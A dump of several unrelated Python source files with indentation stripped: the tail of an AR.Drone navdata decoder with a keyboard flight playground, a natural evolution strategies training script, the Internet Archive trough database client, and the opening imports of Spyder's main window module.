##### ID = 21 ### "pressure_raw" ###############################################
def decode_ID21(packet): #NAVDATA_PRESSURE_RAW_TAG
dataset = struct.unpack_from("HHihii", packet, offsetND)
if dataset[1] != 18: print "*** ERROR : navdata-pressure_raw-Package (ID=21) has the wrong size !!!"
pressure_raw = [0,0,0,0]
pressure_raw[0] = dataset[2] # up (int32)
pressure_raw[1] = dataset[3] # ut (int16)
pressure_raw[2] = dataset[4] # Temperature_meas (int32)
pressure_raw[3] = dataset[5] # Pression_meas (int32)
return(pressure_raw)
##### ID = 22 ### "magneto" ####################################################
def decode_ID22(packet): #NAVDATA_MAGNETO_TAG
dataset = struct.unpack_from("HHhhhffffffffffffBifff", packet, offsetND)
if dataset[1] != 83: print "*** ERROR : navdata-magneto-Package (ID=22) has the wrong size !!!"
magneto = [[0,0,0],[0.0,0.0,0.0],[0.0,0.0,0.0],[0.0,0.0,0.0],0.0,0.0,0.0,0,0,0.0,0.0,0.0]
for i in range (0,3,1): magneto[0][i]=dataset[2+i] # mx/my/mz (int16)
for i in range (0,3,1): magneto[1][i]=dataset[5+i] # magneto_raw magneto in the body frame [mG] (vector float)
for i in range (0,3,1): magneto[2][i]=dataset[8+i] # magneto_rectified (vector float)
for i in range (0,3,1): magneto[3][i]=dataset[11+i] # magneto_offset (vector float)
magneto[ 4] = dataset[14] # heading_unwrapped (float)
magneto[ 5] = dataset[15] # heading_gyro_unwrapped (float)
magneto[ 6] = dataset[16] # heading_fusion_unwrapped (float)
magneto[ 7] = dataset[17] # magneto_calibration_ok (char)
magneto[ 8] = dataset[18] # magneto_state (uint32)
magneto[ 9] = dataset[19] # magneto_radius (float)
magneto[10] = dataset[20] # error_mean (float)
magneto[11] = dataset[21] # error_var (float)
return(magneto)
##### ID = 23 ### "wind_speed" ################################################
def decode_ID23(packet): #NAVDATA_WIND_TAG
dataset = struct.unpack_from("HHfffffffffffff", packet, offsetND)
if dataset[1] != 56 and dataset[1] != 64:
print "*** ERROR : navdata-wind_speed-Package (ID=23) has the wrong size !!!"
wind_speed = [0.0,0.0,[0.0,0.0],[0.0,0.0,0.0,0.0,0.0,0.0],[0.0,0.0,0.0]]
wind_speed[0] = dataset[2] # wind_speed (float)
wind_speed[1] = dataset[3] # wind_angle (float)
wind_speed[2][0] = dataset[4] # wind_compensation_theta (float)
wind_speed[2][1] = dataset[5] # wind_compensation_phi (float)
for i in range (0,6,1): wind_speed[3][i]=dataset[6+i] # state_x[1-6] (float)
for i in range (0,3,1): wind_speed[4][i]=dataset[7+i] # magneto_debug[1-3] (float)
return(wind_speed)
##### ID = 24 ### "kalman_pressure" ###########################################
def decode_ID24(packet): #NAVDATA_KALMAN_PRESSURE_TAG
dataset = struct.unpack_from("HHffffffffff?f?ff??", packet, offsetND)
if dataset[1] != 72: print "*** ERROR : navdata-wind_speed-Package (ID=24) has the wrong size !!!"
kalman_pressure = [0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0,0.0,False,0.0,0.0,False,False]
kalman_pressure[ 0] = dataset[2] # offset_pressure (float)
kalman_pressure[ 1] = dataset[3] # est_z (float)
kalman_pressure[ 2] = dataset[4] # est_zdot (float)
kalman_pressure[ 3] = dataset[5] # est_bias_PWM (float)
kalman_pressure[ 4] = dataset[6] # est_biais_pression (float)
kalman_pressure[ 5] = dataset[7] # offset_US (float)
kalman_pressure[ 6] = dataset[8] # prediction_US (float)
kalman_pressure[ 7] = dataset[9] # cov_alt (float)
kalman_pressure[ 8] = dataset[10] # cov_PWM (float)
kalman_pressure[ 9] = dataset[11] # cov_vitesse (float)
kalman_pressure[10] = dataset[12] # bool_effet_sol (bool)
kalman_pressure[11] = dataset[13] # somme_inno (float)
kalman_pressure[12] = dataset[14] # flag_rejet_US (bool)
kalman_pressure[13] = dataset[15] # u_multisinus (float)
kalman_pressure[14] = dataset[16] # gaz_altitude (float)
kalman_pressure[15] = dataset[17] # Flag_multisinus (bool)
kalman_pressure[16] = dataset[18] # Flag_multisinus_debut (bool)
return(kalman_pressure)
##### ID = 25 ### "hdvideo_stream" ############################################
def decode_ID25(packet): #NAVDATA_HDVIDEO-TAG
dataset = struct.unpack_from("HHfffffff", packet, offsetND)
if dataset[1] != 32: print "*** ERROR : navdata-hdvideo_stream-Package (ID=25) has the wrong size !!!"
hdvideo_stream = [0.0,0.0,0.0,0.0,0.0,0.0,0.0]
hdvideo_stream[0] = dataset[2] # hdvideo_state (float)
hdvideo_stream[1] = dataset[3] # storage_fifo_nb_packets (float)
hdvideo_stream[2] = dataset[4] # storage_fifo_size (float)
hdvideo_stream[3] = dataset[5] # usbkey_size USB key in kb (no key=0)(float)
hdvideo_stream[4] = dataset[6] # usbkey_freespace USB key in kb (no key=0)(float)
hdvideo_stream[5] = dataset[7] # frame_number PaVE field of the frame starting to be encoded for the HD stream (float)
hdvideo_stream[6] = dataset[8] # usbkey_remaining_time [sec] (float)
return(hdvideo_stream)
##### ID = 26 ### "wifi" ######################################################
def decode_ID26(packet): #NAVDATA_WIFI_TAG
dataset = struct.unpack_from("HHI", packet, offsetND)
if dataset[1] != 8: print "*** ERROR : navdata-wifi-Package (ID=26) has the wrong size !!!"
wifi = dataset[2] # link_quality (uint32)
return(wifi)
##### ID = 27 ### "zimmu_3000" ################################################
def decode_ID27(packet): #NAVDATA_ZIMU_3000_TAG
dataset = struct.unpack_from("HHif", packet, offsetND)
if dataset[1] != 12 and dataset[1] != 216: # 216 since firmware 2.4.8 ?
print "*** ERROR : navdata-zimmu_3000-Package (ID=27) has the wrong size !!!"
zimmu_3000 = [0,0.0]
zimmu_3000[0] = dataset[2] # vzimmuLSB (int32)
zimmu_3000[1] = dataset[3] # vzfind (float)
return(zimmu_3000)
##### Footer ### "chksum" #####################################################
def decode_Footer(packet,allpacket): ### Decode Checksum options-package ID=65535
dataset = struct.unpack_from("HHI", packet, offsetND)
if dataset[1] != 8: print "*** ERROR : Checksum-Options-Package (ID=65535) has the wrong size !!!"
chksum = [0,False]
chksum[0] = dataset[2]
sum, plen = 0, len(allpacket)-8
for i in range (0,plen,1): sum += ord(allpacket[i]) # Slows down this Navdata-subprocess massivly
if sum == chksum[0]: chksum[1] = True
return(chksum)
###############################################################################
### Navdata-Decoding
###############################################################################
def getDroneStatus(packet):
arState = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
checksum = (0,False)
length = len(packet)
dataset = struct.unpack_from("IIII", packet, 0) # Reading (Header, State, Sequence, Vision)
offsetND = struct.calcsize("IIII")
###############################=-
### Decode Options-Packages ###=-
###############################=-
def getNavdata(packet,choice):
navdata = {}
length = len(packet)
dataset = struct.unpack_from("IIII", packet, 0) # Reading (Header, State, Sequence, Vision)
navdata["state"] = decode_Header(dataset)
offsetND = struct.calcsize("IIII")
#Demo-mode contains normally Option-Packages with ID=0 (_navdata_demo_t), ID=16 (seems empty) and ID=65535 (checksum)
# Full Mode contains
while offsetND < length:
dataset = struct.unpack_from("HH", packet, offsetND) # Reading (Header, Length)
if dataset[0]== 0 and choice[ 0]: navdata["demo"] = decode_ID0(packet[offsetND:])
if dataset[0]== 1 and choice[ 1]: navdata["time"] = decode_ID1(packet[offsetND:])
if dataset[0]== 2 and choice[ 2]: navdata["raw_measures"] = decode_ID2(packet[offsetND:])
if dataset[0]== 3 and choice[ 3]: navdata["phys_measures"] = decode_ID3(packet[offsetND:])
if dataset[0]== 4 and choice[ 4]: navdata["gyros_offsets"] = decode_ID4(packet[offsetND:])
if dataset[0]== 5 and choice[ 5]: navdata["euler_angles"] = decode_ID5(packet[offsetND:])
if dataset[0]== 6 and choice[ 6]: navdata["references"] = decode_ID6(packet[offsetND:])
if dataset[0]== 7 and choice[ 7]: navdata["trims"] = decode_ID7(packet[offsetND:])
if dataset[0]== 8 and choice[ 8]: navdata["rc_references"] = decode_ID8(packet[offsetND:])
if dataset[0]== 9 and choice[ 9]: navdata["pwm"] = decode_ID9(packet[offsetND:])
if dataset[0]==10 and choice[10]: navdata["altitude"] = decode_ID10(packet[offsetND:])
if dataset[0]==11 and choice[11]: navdata["vision_raw"] = decode_ID11(packet[offsetND:])
if dataset[0]==12 and choice[12]: navdata["vision_of"] = decode_ID12(packet[offsetND:])
if dataset[0]==13 and choice[13]: navdata["vision"] = decode_ID13(packet[offsetND:])
if dataset[0]==14 and choice[14]: navdata["vision_perf"] = decode_ID14(packet[offsetND:])
if dataset[0]==15 and choice[15]: navdata["trackers_send"] = decode_ID15(packet[offsetND:])
if dataset[0]==16 and choice[16]: navdata["vision_detect"] = decode_ID16(packet[offsetND:])
if dataset[0]==17 and choice[17]: navdata["watchdog"] = decode_ID17(packet[offsetND:])
if dataset[0]==18 and choice[18]: navdata["adc_data_frame"] = decode_ID18(packet[offsetND:])
if dataset[0]==19 and choice[19]: navdata["video_stream"] = decode_ID19(packet[offsetND:])
if dataset[0]==20 and choice[20]: navdata["games"] = decode_ID20(packet[offsetND:])
if dataset[0]==21 and choice[21]: navdata["pressure_raw"] = decode_ID21(packet[offsetND:])
if dataset[0]==22 and choice[22]: navdata["magneto"] = decode_ID22(packet[offsetND:])
if dataset[0]==23 and choice[23]: navdata["wind_speed"] = decode_ID23(packet[offsetND:])
if dataset[0]==24 and choice[24]: navdata["kalman_pressure"] = decode_ID24(packet[offsetND:])
if dataset[0]==25 and choice[25]: navdata["hdvideo_stream"] = decode_ID25(packet[offsetND:])
if dataset[0]==26 and choice[26]: navdata["wifi"] = decode_ID26(packet[offsetND:])
if dataset[0]==27 and choice[27]: navdata["zimmu_3000"] = decode_ID27(packet[offsetND:])
if dataset[0]==65535 and choice[28]: navdata["chksum"] = decode_Footer(packet[offsetND:],packet)
offsetND += dataset[1]
return(navdata)
###############################=-
### Threads ###=-
###############################=-
def reconnect(navdata_pipe, commitsuicideND, DroneIP,NavDataPort):
if not commitsuicideND: navdata_pipe.sendto("\x01\x00\x00\x00", (DroneIP, NavDataPort))
def watchdogND(parentPID):
global commitsuicideND
while not commitsuicideND:
time.sleep(1)
try : os.getpgid(parentPID)
except: commitsuicideND=True
# It seems that you just have to reinitialize the network-connection once and the drone keeps on sending forever then.
def mainloopND(DroneIP,NavDataPort,parent_pipe,parentPID):
global commitsuicideND
something2send, MinimalPacketLength, timetag = False, 30, 0
packetlist = ["demo","time","raw_measures","phys_measures","gyros_offsets","euler_angles","references","trims","rc_references","pwm","altitude","vision_raw","vision_of","vision","vision_perf","trackers_send","vision_detect","watchdog","adc_data_frame","video_stream","games","pressure_raw","magneto","wind_speed","kalman_pressure","hdvideo_stream","wifi","zimmu_3000","chksum","state"]
choice = [False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,False,True]
overallchoice = False # This and oneTimeFailOver is necessary because of a bug (?) of AR.Drone sending NavData in DemoMode...
oneTimeFailOver = True # ...while setting a configuration the drone sends the next DemoMode-package with just its status.
debug = False
showCommands = False
# Checks if the main-process is running and sends ITS own PID back
ThreadWatchdogND = threading.Thread(target=watchdogND,args=[parentPID])
ThreadWatchdogND.start()
# Prepare communication-pipes
pipes = []
pipes.append(parent_pipe)
navdata_pipe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
navdata_pipe.setblocking(0)
navdata_pipe.bind(('', NavDataPort))
pipes.append(navdata_pipe)
# start connection
reconnect(navdata_pipe, commitsuicideND, DroneIP, NavDataPort)
netHeartbeat = threading.Timer(2.0, reconnect, [navdata_pipe,commitsuicideND,DroneIP,NavDataPort,]) # Inits the first Network-Heartbeat (2 secs after disconnection the drone stops sending)
netHeartbeat.start()
if choice.count(True) > 0: overallchoice = True
while not commitsuicideND:
in_pipe, out_pipe, dummy2 = select.select(pipes, [], [], 0.5) # When something is in a pipe...
for ip in in_pipe:
if ip == parent_pipe:
cmd = parent_pipe.recv()
if showCommands: print "** Com -> Nav : ",cmd
# Signal to stop this process and all its threads
if cmd == "die!": commitsuicideND = True
# Enables/disables Debug-bit
elif cmd == "debug":
debug = True
print "NavData-Process : running"
elif cmd == "undebug":
debug = False
# Enables/disables Debug-bit
elif cmd == "showCommands": showCommands = True
elif cmd == "hideCommands": showCommands = False
elif cmd == "reconnect": reconnect(navdata_pipe, commitsuicideND, DroneIP, NavDataPort)
# Sets explicitly the value-packages which shall be decoded
elif cmd[0] == "send":
if cmd[1].count("all"):
for i in range (0,len(choice),1): choice[i] = True
else:
for i in range (0,len(packetlist),1):
if cmd[1].count(packetlist[i]): choice[i] = True
else: choice[i] = False
if choice.count(True) > 0: overallchoice = True
else: overallchoice = False
# Adds value-packages to the other which shall be decoded
elif cmd[0] == "add":
for i in range (0,len(packetlist),1):
if cmd[1].count(packetlist[i]): choice[i] = True
if cmd[1].count("all"):
for i in range (0,len(choice),1): choice[i] = True
if choice.count(True)>0: overallchoice = True
else: overallchoice = False
# Deletes packages from the value-package-list which shall not be decoded anymore
elif cmd[0] == "block":
if cmd[1].count("all"):
for i in range (0,len(packetlist),1): choice[i] = False
else:
for i in range (0,len(packetlist),1):
if cmd.count(packetlist[i]): choice[i] = False
if choice.count(True) > 0: overallchoice = True
else: overallchoice = False
if ip == navdata_pipe:
try:
netHeartbeat.cancel() # Connection is alive, Network-Heartbeat not necessary for a moment
Packet = navdata_pipe.recv(65535) # Receiving raw NavData-Package
netHeartbeat = threading.Timer(2.1,reconnect,[navdata_pipe,commitsuicideND,DroneIP,NavDataPort])
netHeartbeat.start() # Network-Heartbeat is set here, because the drone keeps on sending NavData (vid, etc you have to switch on)
timestamp = timetag # Setting up decoding-time calculation
timetag = time.time()
if overallchoice:
try: lastdecodedNavData=decodedNavData
except: lastdecodedNavData={}
decodedNavData = getNavdata(Packet,choice)
state = decodedNavData["state"]
# If there is an abnormal small NavPacket, the last NavPacket will be sent out with an error-tag
NoNavData = False
if len(Packet)<MinimalPacketLength and overallchoice: decodedNavData, NoNavData = lastdecodedNavData, True
dectime = time.time()-timetag
# Sends all the data to the mainprocess
parent_pipe.send((decodedNavData, state[0:32], state[32], timestamp, dectime, NoNavData))
except IOError: pass
suicideND = True
netHeartbeat.cancel()
if debug: print "NavData-Process : committed suicide"
##################################################################################################
###### Playground ######
##################################################################################################
if __name__ == "__main__":
###
### Here you can write your first test-codes and play around with them
###
import time
import ps_drone
drone = ps_drone.Drone() # Start using drone
drone.startup() # Connects to drone and starts subprocesses
drone.reset() # Always good, at start
while drone.getBattery()[0] == -1: time.sleep(0.1) # Waits until the drone has done its reset
time.sleep(0.5) # Give it some time to fully awake
print "Battery: "+str(drone.getBattery()[0])+"% "+str(drone.getBattery()[1]) # Gives a battery-status
stop = False
while not stop:
key = drone.getKey()
if key == " ":
if drone.NavData["demo"][0][2] and not drone.NavData["demo"][0][3]: drone.takeoff()
else: drone.land()
elif key == "0": drone.hover()
elif key == "w": drone.moveForward()
elif key == "s": drone.moveBackward()
elif key == "a": drone.moveLeft()
elif key == "d": drone.moveRight()
elif key == "q": drone.turnLeft()
elif key == "e": drone.turnRight()
elif key == "7": drone.turnAngle(-10,1)
elif key == "9": drone.turnAngle( 10,1)
elif key == "4": drone.turnAngle(-45,1)
elif key == "6": drone.turnAngle( 45,1)
elif key == "1": drone.turnAngle(-90,1)
elif key == "3": drone.turnAngle( 90,1)
elif key == "8": drone.moveUp()
elif key == "2": drone.moveDown()
elif key == "*": drone.doggyHop()
elif key == "+": drone.doggyNod()
elif key == "-": drone.doggyWag()
elif key != "": stop = True
print "Batterie: "+str(drone.getBattery()[0])+"% "+str(drone.getBattery()[1]) # Gives a battery-status
|
natural_es.py
|
import torch
import torch.multiprocessing as mp
from torch.multiprocessing import SimpleQueue
import numpy as np
from utils import *
import pickle
from config import *
import time
class Worker(mp.Process):
def __init__(self, id, param, state_normalizer, task_q, result_q, stop, config):
mp.Process.__init__(self)
self.id = id
self.task_q = task_q
self.param = param
self.result_q = result_q
self.stop = stop
self.config = config
self.evaluator = Evaluator(config, state_normalizer)
def run(self):
config = self.config
np.random.seed()
while not self.stop.value:
if self.task_q.empty():
continue
self.task_q.get()
disturbed_param = np.copy(self.param.numpy().flatten())
epsilon = np.random.randn(len(disturbed_param))
disturbed_param += config.sigma * epsilon
fitness, steps = self.evaluator.eval(disturbed_param)
self.result_q.put([epsilon, -fitness, steps])
def train(config):
task_queue = SimpleQueue()
result_queue = SimpleQueue()
stop = mp.Value('i', False)
stats = SharedStats(config.state_dim)
param = torch.FloatTensor(torch.from_numpy(config.initial_weight))
param.share_memory_()
normalizers = [StaticNormalizer(config.state_dim) for _ in range(config.num_workers)]
for normalizer in normalizers:
normalizer.offline_stats.load(stats)
workers = [Worker(id, param, normalizers[id], task_queue, result_queue, stop, config) for id in range(config.num_workers)]
for w in workers: w.start()
training_rewards = []
training_steps = []
training_timestamps = []
initial_time = time.time()
total_steps = 0
iteration = 0
while not stop.value:
test_mean, test_ste = test(config, param.numpy(), stats)
elapsed_time = time.time() - initial_time
training_rewards.append(test_mean)
training_steps.append(total_steps)
training_timestamps.append(elapsed_time)
logger.info('Test: total steps %d, %f(%f), elapsed time %d' %
(total_steps, test_mean, test_ste, elapsed_time))
for i in range(config.pop_size):
task_queue.put(i)
rewards = []
epsilons = []
steps = []
while len(rewards) < config.pop_size:
if result_queue.empty():
continue
epsilon, fitness, step = result_queue.get()
epsilons.append(epsilon)
rewards.append(fitness)
steps.append(step)
total_steps += np.sum(steps)
r_mean = np.mean(rewards)
r_std = np.std(rewards)
# rewards = (rewards - r_mean) / r_std
logger.info('Train: iteration %d, %f(%f)' % (iteration, r_mean, r_std / np.sqrt(config.pop_size)))
iteration += 1
# if r_mean > config.target:
if config.max_steps and total_steps > config.max_steps:
stop.value = True
break
for normalizer in normalizers:
stats.merge(normalizer.online_stats)
normalizer.online_stats.zero()
for normalizer in normalizers:
normalizer.offline_stats.load(stats)
rewards = fitness_shift(rewards)
gradient = np.asarray(epsilons) * np.asarray(rewards).reshape((-1, 1))
gradient = np.mean(gradient, 0) / config.sigma
gradient -= config.weight_decay * gradient
gradient = config.opt.update(gradient)
gradient = torch.FloatTensor(gradient)
param.add_(config.learning_rate * gradient)
for w in workers: w.join()
return [training_rewards, training_steps, training_timestamps]
def test(config, solution, stats):
normalizer = StaticNormalizer(config.state_dim)
normalizer.offline_stats.load_state_dict(stats.state_dict())
evaluator = Evaluator(config, normalizer)
evaluator.model.set_weight(solution)
rewards = []
for i in range(config.test_repetitions):
reward, _ = evaluator.single_run()
rewards.append(reward)
return np.mean(rewards), np.std(rewards) / config.test_repetitions
def multi_runs(config):
fh = logging.FileHandler('log/%s-%s.txt' % (config.tag, config.task))
fh.setLevel(logging.DEBUG)
logger.addHandler(fh)
stats = []
runs = 10
for run in range(runs):
logger.info('Run %d' % (run))
stats.append(train(config))
with open('data/%s-stats-%s.bin' % (config.tag, config.task), 'wb') as f:
pickle.dump(stats, f)
def all_tasks():
configs = []
hidden_size = 64
# config = PendulumConfig(hidden_size)
# configs.append(config)
# config = ContinuousLunarLanderConfig(hidden_size)
# configs.append(config)
config = BipedalWalkerConfig(hidden_size)
configs.append(config)
config = BipedalWalkerHardcore(hidden_size)
configs.append(config)
ps = []
for cf in configs:
cf.num_workers = 8
cf.pop_size = 64
cf.sigma = 0.1
cf.learning_rate = 0.1
# cf.action_noise_std = 0.02
cf.max_steps = int(1e7)
cf.tag = 'NES-%d' % (cf.hidden_size)
ps.append(mp.Process(target=multi_runs, args=(cf, )))
for p in ps: p.start()
for p in ps: p.join()
if __name__ == '__main__':
all_tasks()
|
client.py
|
'''
trough/client.py - trough client code
Copyright (C) 2017-2019 Internet Archive
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,
USA.
'''
from __future__ import absolute_import
import logging
import os
import json
import requests
import doublethink
import rethinkdb as r
import datetime
import threading
import time
import collections
from aiohttp import ClientSession
class TroughException(Exception):
def __init__(self, message, payload=None, returned_message=None):
super().__init__(message)
self.payload = payload
self.returned_message = returned_message
class TroughSegmentNotFound(TroughException):
pass
class TroughClient(object):
logger = logging.getLogger('trough.client.TroughClient')
def __init__(self, rethinkdb_trough_db_url, promotion_interval=None):
'''
TroughClient constructor
Args:
rethinkdb_trough_db_url: url with schema rethinkdb:// pointing to
trough configuration database
promotion_interval: if specified, `TroughClient` will spawn a
thread that "promotes" (pushed to hdfs) "dirty" trough segments
(segments that have received writes) periodically, sleeping for
`promotion_interval` seconds between cycles (default None)
'''
parsed = doublethink.parse_rethinkdb_url(rethinkdb_trough_db_url)
self.rr = doublethink.Rethinker(
servers=parsed.hosts, db=parsed.database)
self.svcreg = doublethink.ServiceRegistry(self.rr)
self._write_url_cache = {}
self._read_url_cache = {}
self._dirty_segments = set()
self._dirty_segments_lock = threading.RLock()
self.promotion_interval = promotion_interval
self._promoter_thread = None
if promotion_interval:
self._promoter_thread = threading.Thread(
target=self._promotrix, name='TroughClient-promoter')
self._promoter_thread.setDaemon(True)
self._promoter_thread.start()
def _promotrix(self):
while True:
time.sleep(self.promotion_interval)
try:
with self._dirty_segments_lock:
dirty_segments = list(self._dirty_segments)
self._dirty_segments.clear()
self.logger.info(
'promoting %s trough segments', len(dirty_segments))
for segment_id in dirty_segments:
try:
self.promote(segment_id)
except:
self.logger.error(
'problem promoting segment %s', segment_id,
exc_info=True)
except:
self.logger.error(
'caught exception doing segment promotion',
exc_info=True)
def promote(self, segment_id):
url = os.path.join(self.segment_manager_url(), 'promote')
payload_dict = {'segment': segment_id}
self.logger.debug('posting %s to %s', json.dumps(payload_dict), url)
response = requests.post(url, json=payload_dict, timeout=21600)
if response.status_code != 200:
raise TroughException(
'unexpected response %r %r: %r from POST %r with '
'payload %r' % (
response.status_code, response.reason, response.text,
url, json.dumps(payload_dict)))
@staticmethod
def sql_value(x):
if x is None:
return 'null'
elif isinstance(x, datetime.datetime):
return 'datetime(%r)' % x.isoformat()
elif isinstance(x, bool):
return int(x)
elif isinstance(x, str) or isinstance(x, bytes):
# the only character that needs escaped in sqlite string literals
# is single-quote, which is escaped as two single-quotes
if isinstance(x, bytes):
s = x.decode('utf-8')
else:
s = x
return "'" + s.replace("'", "''") + "'"
elif isinstance(x, (int, float)):
return x
else:
raise TroughException(
"don't know how to make an sql value from %r (%r)" % (
x, type(x)))
def segment_manager_url(self):
master_node = self.svcreg.unique_service('trough-sync-master')
if not master_node:
raise TroughException(
'no healthy trough-sync-master in service registry')
return master_node['url']
def write_url_nocache(self, segment_id, schema_id='default'):
url = os.path.join(self.segment_manager_url(), 'provision')
payload_dict = {'segment': segment_id, 'schema': schema_id}
self.logger.debug('posting %s to %s', json.dumps(payload_dict), url)
response = requests.post(url, json=payload_dict, timeout=600)
if response.status_code != 200:
raise TroughException(
'unexpected response %r %r: %r from POST %r with '
'payload %r' % (
response.status_code, response.reason, response.text,
url, json.dumps(payload_dict)))
result_dict = response.json()
# assert result_dict['schema'] == schema_id # previously provisioned?
return result_dict['write_url']
def read_url_nocache(self, segment_id):
reql = self.rr.table('services', read_mode='outdated').get_all(
segment_id, index='segment').filter(
{'role':'trough-read'}).filter(
lambda svc: r.now().sub(
svc['last_heartbeat']).lt(svc['ttl'])
).order_by('load')
self.logger.debug('querying rethinkdb: %r', reql)
results = reql.run()
try:
return results[0]['url']
except:
raise TroughSegmentNotFound(
'no read url for segment %s; usually this means the '
"segment hasn't been provisioned yet" % segment_id)
def read_urls_for_regex(self, regex):
'''
Looks up read urls for segments matching `regex`.
Populates `self._read_url_cache` and returns dictionary
`{segment: url}`
'''
d = {}
reql = self.rr.table('services', read_mode='outdated')\
.filter({'role': 'trough-read'})\
.filter(r.row.has_fields('segment'))\
.filter(lambda svc: svc['segment'].coerce_to('string').match(regex))\
.filter(lambda svc: r.now().sub(svc['last_heartbeat']).lt(svc['ttl']))
self.logger.debug('querying rethinkdb: %r', reql)
results = reql.run()
for result in results:
d[result['segment']] = result['url']
self._read_url_cache[result['segment']] = result['url']
return d
def schemas(self):
reql = self.rr.table('schema', read_mode='outdated')
for result in reql.run():
yield collections.OrderedDict([('name', result['id'])])
def schema(self, id):
reql = self.rr.table('schema', read_mode='outdated').get(id)
result = reql.run()
if result:
return [collections.OrderedDict([(id, result['sql'])])]
else:
return None
def readable_segments(self, regex=None):
reql = self.rr.table('services', read_mode='outdated')\
.filter({'role':'trough-read'})\
.filter(lambda svc: r.now().sub(svc['last_heartbeat'])\
.lt(svc['ttl']))
if regex:
reql = reql.filter(
lambda svc: svc['segment'].coerce_to('string').match(regex))
self.logger.debug('querying rethinkdb: %r', reql)
results = reql.run()
for result in reql.run():
yield collections.OrderedDict([
('segment', result['segment']),
('url', result['url']),
('first_heartbeat', result['first_heartbeat']),
('last_heartbeat', result['last_heartbeat'])])
def write_url(self, segment_id, schema_id='default'):
if not segment_id in self._write_url_cache:
self._write_url_cache[segment_id] = self.write_url_nocache(
segment_id, schema_id)
self.logger.info(
'segment %r write url is %r', segment_id,
self._write_url_cache[segment_id])
return self._write_url_cache[segment_id]
def read_url(self, segment_id):
if not self._read_url_cache.get(segment_id):
self._read_url_cache[segment_id] = self.read_url_nocache(segment_id)
self.logger.info(
'segment %r read url is %r', segment_id,
self._read_url_cache[segment_id])
return self._read_url_cache[segment_id]
def write(self, segment_id, sql_tmpl, values=(), schema_id='default'):
write_url = self.write_url(segment_id, schema_id)
sql = sql_tmpl % tuple(self.sql_value(v) for v in values)
sql_bytes = sql.encode('utf-8')
try:
response = requests.post(
write_url, sql_bytes, timeout=600,
headers={'content-type': 'application/sql;charset=utf-8'})
if response.status_code != 200:
raise TroughException(
'unexpected response %r %r: %r from POST %r with '
'payload %r' % (
response.status_code, response.reason,
response.text, write_url, sql_bytes), sql_bytes, response.text)
if segment_id not in self._dirty_segments:
with self._dirty_segments_lock:
self._dirty_segments.add(segment_id)
except Exception as e:
self._write_url_cache.pop(segment_id, None)
raise e
def read(self, segment_id, sql_tmpl, values=()):
read_url = self.read_url(segment_id)
sql = sql_tmpl % tuple(self.sql_value(v) for v in values)
sql_bytes = sql.encode('utf-8')
try:
response = requests.post(
read_url, sql_bytes, timeout=600,
headers={'content-type': 'application/sql;charset=utf-8'})
if response.status_code != 200:
raise TroughException(
'unexpected response %r %r %r from %r to query %r' % (
response.status_code, response.reason, response.text,
read_url, sql_bytes), sql_bytes, response.text)
self.logger.trace(
'got %r from posting query %r to %r', response.text, sql,
read_url)
results = json.loads(response.text)
return results
except Exception as e:
self._read_url_cache.pop(segment_id, None)
raise e
async def async_read(self, segment_id, sql_tmpl, values=()):
read_url = self.read_url(segment_id)
sql = sql_tmpl % tuple(self.sql_value(v) for v in values)
sql_bytes = sql.encode('utf-8')
async with ClientSession() as session:
async with session.post(
read_url, data=sql_bytes, headers={
'content-type': 'application/sql;charset=utf-8'}) as res:
if res.status != 200:
self._read_url_cache.pop(segment_id, None)
text = await res.text('utf-8')
raise TroughException(
'unexpected response %r %r %r from %r to '
'query %r' % (
res.status, res.reason, text, read_url,
sql), sql_bytes, text)
results = list(await res.json())
return results
def schema_exists(self, schema_id):
url = os.path.join(self.segment_manager_url(), 'schema', schema_id)
response = requests.get(url, timeout=60)
if response.status_code == 200:
return True
elif response.status_code == 404:
return False
else:
try:
response.raise_for_status()
except Exception as e:
raise TroughException(e)
def register_schema(self, schema_id, sql):
url = os.path.join(
self.segment_manager_url(), 'schema', schema_id, 'sql')
response = requests.put(url, sql, timeout=600)
if response.status_code not in (201, 204):
raise TroughException(
'unexpected response %r %r %r from %r to query %r' % (
response.status_code, response.reason, response.text,
url, sql))
def delete_segment(self, segment_id):
url = os.path.join(self.segment_manager_url(), 'segment', segment_id)
self.logger.debug('DELETE %s', url)
response = requests.delete(url, timeout=1200)
if response.status_code == 404:
raise TroughSegmentNotFound('received 404 from DELETE %s' % url)
elif response.status_code != 204:
raise TroughException(
'unexpected response %r %r: %r from DELETE %s' % (
response.status_code, response.reason, response.text,
url))
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QKeySequence
from qtpy.QtWidgets import (QApplication, QMainWindow, QMenu, QMessageBox,
QShortcut, QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
